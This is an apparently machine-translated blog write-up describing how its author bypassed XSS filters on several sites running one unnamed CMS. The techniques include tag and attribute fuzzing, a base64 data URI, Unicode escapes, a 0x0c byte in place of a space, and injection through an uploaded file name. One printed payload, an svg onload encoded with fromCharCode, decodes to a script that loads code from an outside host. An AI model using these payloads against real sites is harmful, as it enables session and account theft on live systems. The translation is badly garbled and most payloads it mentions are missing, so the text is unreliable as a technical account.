(GO) exp1://An interesting XSS vulnerability mining analysis (1)

Recently met a new friend, every day to find me to engage in XSS. After three days, I feel that this program is still very interesting. Because it is a past style article, so there is no diagram. But hope to share the experience, can help the same as I love XSS friends. I personally prefer rich text XSS because it's fun. The interesting thing is that you need 1.1 points of testing to filter out what, how to filter. I think this is the most fascinating part of the black box test.

First, the module that commits the problem is locked because the block has an editor. Then start fuzz the filter rule. A total of two input points: title, content
I generally like to start with the content, because there is no length limit for this piece. First Test some tags that can be used for XSS attacks.

01:

<script><a><p><body><button><var><div><iframe>< Meta><object><marquee><isindex ><input><select>><keygen><frameset ><embed><svg><math><video><audio><textarea

After a series of tests, it was found that only and <a> tags survived. This is more embarrassing. In this case the general can be used, the attributes are several onload,onerror,onmouseover,onclick and href
After clearing the train of thought and starting the second round of tests, it is the attribute test:

01;

01:

<a href  onmouseover  onclick >

After the test, these easy-to-use on events were filtered out. However, in order to prevent the insertion <script> The SCR filter, so the href also can not write pseudo-protocol to perform XSS.
When I got here, I thought about getting a data URI (<a href=data:text/html;base64,phnjcmlwdd5hbgvydcg0msk8l3njcmlwdd4=> help </a>). At least FF will inherit the current domain. But the friends do not want to AH. Think that is also this is playing backstage, can only engage in some through the killing of XSS, or not white pull. And then looked back at the next headline. or the test flow above. The accidental discovery header did not filter the IMG tag, only the onload was not filtered by the attribute type. And then we'll try.

01:

was intercepted. After a test of the egg ache, the document was filtered out for a while. All right...... Turn into Unicode and continue around:

This is over, but the page was ruined. Oh, people always have so many days will be foolish force. Re-register an account. Thought this time will be done once, so still avoid single quotation marks, wrote a:

Well, it's been intercepted again. Test for a long time finally impatient (the title has a word limit, if you do not find the filter characters, but the entire article is turned, the length will not be enough). found that char was filtered (a look at the anti-injection and anti-XSS write together.) Why the Cock silk ... ), it's not like going this way again. Change Position:

Finally wrote a no document, no char, no SCR payload, two more words will not plug in. After writing the general payload, sent to the base friend, a day. He again M I said, there is a same station, but can't make it.

I don't know why a set of programs have so many variants. The situation is more interesting this time. The tags that were inserted into the content are htmlencode. The IMG tag can no longer be inserted at the title. Thought it would be an upgrade version. He said it was OK, I know this can not be done, can not be confused. Change who is angry. Continue with the previous way, fuzz the label allowed at the title, fuzz out 4:
<div> <style> <a>
Start to do property testing, or the above set of methods, found <p onmouseover> no problem, the above payload changed a change.

He was sent to bed. The third day, he made another stop to say that the previous two methods are not. It's strange. This wonderful program is in the end who is maintaining, f4ck it. It's more interesting this time. The title and content were HTMLEncode, and the editor was removed directly. But this time there's a lot of features. called Upload image. Actually, when I got here, I was already tired. But give up is not my character, can only continue to engage. This is one of my favorite Linux, because the name of the naming rules are not win so sentimental. Made a picture, the name changed to:

.png

Because it is a new feature. The programmer does not htmlencode the file name directly in the page, the small box once again bounce up. It's much more comfortable ... But there's a new problem. Because it is a file upload, so we can not appear in the payload, "/" I think it should be recognized as filepath and then truncated. Another position:

<svg Onload=\u0064cument.write (String.from\u0043harcode ( 60,115,99,114,105,112,116,32,115,114,99,61,47,47,122,115,121,46,99,97,47,51,51,62,60,47,115,99,114,105,112,116,62 ))

No SCR, no char, no document, no "/" posture even if it's written.
It's not over yet. There are 1 of them. He sent me a variant later. Said it could be plugged in but could not execute. Took over the website and looked down. Good boy, it's more fun this time. In the previous three stations, the title length limit was 100 (not client-side validation, which was limited when defining database fields). The length of the 35,payload was eaten only after the rest of the time. Visual database that block has not changed, but on the PHP side, made a limit. There's another security treasure. The other is okay to dismantle. This onmouseover split into 10 20, let a person row past, this heart inside not bottom ah. can only find other payload. This time also tired, just try a bit:

After the post, it becomes:

For a moment I did not understand what the situation was, and then tried it:

has become:

01.

It turns out that when more than one space is found, the second space starts to put the contents of the back down. That's all right. Change the space of the law son more, sacrifice Hexeditor, the second space replaced by 0x0c:

After saving, copy payload:

My little boy is finally bouncing off my feet. In general, the previously filtered characters (Document,scr,char, "/") are intended to be converted into 8. Anyway, the finished content will have to be eval at the end. There is the following:

01.02.03.04.05.06.07.08.09.10.11. 12.13.14.15.16.17.18.19.20.21.22.23.24. 25. 

When inserting, reverse-insert (because posts are rendered in chronological order). Finally, even if it's done. It feels like a very interesting experience. It's a bit long, but it should be helpful to read it patiently. Although not a bunker program, but there are many domestic * * * are using this set. So it is inconvenient to disclose which set. If you know what it is, I hope you don't say it.

(GO) exp1://An interesting XSS vulnerability mining analysis (1)